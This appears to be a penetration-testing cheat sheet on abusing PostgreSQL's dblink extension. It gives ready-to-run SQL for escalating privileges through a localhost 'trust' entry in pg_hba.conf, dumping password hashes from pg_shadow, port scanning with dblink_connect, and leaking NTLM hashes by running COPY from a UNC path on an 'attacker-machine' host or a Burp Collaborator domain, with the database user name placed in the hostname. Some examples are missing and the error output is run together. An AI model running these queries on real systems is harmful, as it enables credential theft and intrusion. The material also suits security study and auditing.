Network - Privesc, Port Scanner and NTLM chanllenge response disclosure

Since PostgreSQL 9.1, installation of additional modules is simple. Registered extensions like dblink can be installed with CREATE EXTENSION:

Once you have dblink loaded you could be able to perform some interesting tricks:

Privilege Escalation

The file pg_hba.conf could be bad configured allowing connections from localhost as any user without needing to know the password. This file could be typically found in /etc/postgresql/12/main/pg_hba.conf and a bad configuration looks like:

Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it. Note also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user.

This case is useful if you already have a shell inside the victim as it will allow you to connect to postgresql database.

Another possible misconfiguration consist on something like this:

host    all     all     127.0.0.1/32    trust

As it will allow everybody from the localhost to connect to the database as any user. In this case and if the dblink function is working, you could escalate privileges by connecting to the database through an already established connection and access data shouldn't be able to access:

SELECT * FROM dblink('host=127.0.0.1                          user=postgres                          dbname=postgres',                         'SELECT datname FROM pg_database')                      RETURNS (result TEXT);​SELECT * FROM dblink('host=127.0.0.1                          user=postgres                          dbname=postgres',                         'select usename, passwd from pg_shadow')                      RETURNS (result1 TEXT, result2 TEXT);

Find more information about this attack in this paper.

Port Scanning

Abusing dblink_connect you could also search open ports. If that function doesn't work you should try to use dblink_connect_u() as the documentation says that dblink_connect_u() is identical to dblink_connect(), except that it will allow non-superusers to connect using any authentication method.

SELECT * FROM dblink_connect('host=216.58.212.238                                  port=443                                  user=name                                  password=secret                                  dbname=abc                                  connect_timeout=10');RROR:  could not establish connectionDETAIL:  could not connect to server: Connection refused	Is the server running on host "127.0.0.1" and accepting	TCP/IP connections on port 4444?​ERROR:  could not establish connectionDETAIL:  timeout expired​ERROR:  could not establish connectionDETAIL:  timeout expired​ERROR:  could not establish connectionDETAIL:  received invalid response to SSL negotiation:

Note that before being able to use dblink_connect or dblink_connect_u you may need to execute:

UNC path - NTLM hash disclosure

CREATE TABLE test();COPY test FROM E'\\\\attacker-machine\\footestbar.txt';

CREATE TABLE test(retval text);CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$ DECLARE sqlstring TEXT;DECLARE userval TEXT;BEGIN SELECT INTO userval (SELECT user);sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';EXECUTE sqlstring;END;$$ LANGUAGE plpgsql SECURITY DEFINER;SELECT testfunc();